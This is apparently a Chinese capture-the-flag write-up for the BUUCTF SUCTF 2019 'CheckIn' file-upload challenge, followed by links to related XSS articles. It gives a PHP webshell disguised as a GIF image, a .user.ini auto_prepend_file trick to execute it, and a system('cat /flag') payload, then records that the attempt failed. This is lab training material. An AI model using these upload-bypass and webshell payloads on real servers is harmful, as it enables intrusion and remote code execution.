106,【6】 buuctf web [SUCTF 2019]CheckIn

进入靶场

文件上传

老规矩,桌面有啥传啥

过滤了<?

寻找不含<?的一句话木马

文件名

123(2).php.jpg

文件内容

GIF89a?

<script language="php">eval($_GET'123');</script>

123即密码,可凭借个人喜好更换

再上传一个文件将jpg文件变成php文件执行

这里用到.htaccess发现不行

尝试.user.ini

文件名

123(3).user.ini

文件内容

GIF89a

auto_prepend_file=123(3).php.jpg

文件名

123(3).php.jpg

文件内容

GIF89a

<script language='php'>system('cat /flag');</script>

按理说该查看即可得到flag了

但查看时为空

看看是哪步出了问题

没有上传成功

修改文件名,还是上传不成功

摧毁靶机,重试

要么url中81就不见了,像上图

要么返回上传页面

还发现不管上传什么路径都不变,尝试上传下面这张图片,还是那个路径,不是,路径变都不变,还是没上传成功,访问不到,这只是一个中规中矩的图片

尝试修改文件那么多遍,合着题目有问题

我再最后改一次

再开启一次靶场

还是不行

净是些让人破防的题

想到见到了很多次状态码500,搜搜看什么意思

so???????????????????????????????

相关推荐
味悲2 天前
浏览器解析机制与XSS的15种编码绕过
前端·xss
味悲4 天前
XSS、CSRF、SSRF学习笔记
安全·xss·csrf
Chengbei114 天前
SoloXSS:一款现代化的自托管 XSS平台
人工智能·安全·web安全·网络安全·自动化·xss·安全架构
德福危险5 天前
富有想象力的XSS盲打:靶机练习之Tempus_fugit5
服务器·网络·xss
德福危险5 天前
从盲打xss到到模板注入:unix靶机渗透之Tempus_fugit4
前端·unix·xss
憧憬成为web高手5 天前
皮卡丘靶场速通--XSS
前端·xss
Chengbei116 天前
全新ARL资产灯塔系统(重构版),多维闭环侦察体系,覆盖边界探测、指纹识别、信息收集检测全链路场景
人工智能·安全·web安全·网络安全·重构·系统安全·xss
ccino .6 天前
Hackerone-地址栏xss
网络安全·xss
txg6666 天前
路径级持久化模糊测试:XSSky 如何精准击破 XSS 漏洞
深度学习·安全·web安全·网络安全·xss
云水一下9 天前
DVWA从入门到精通(十一):XSS (Stored)(存储型XSS)
web安全·xss·dvwa·存储型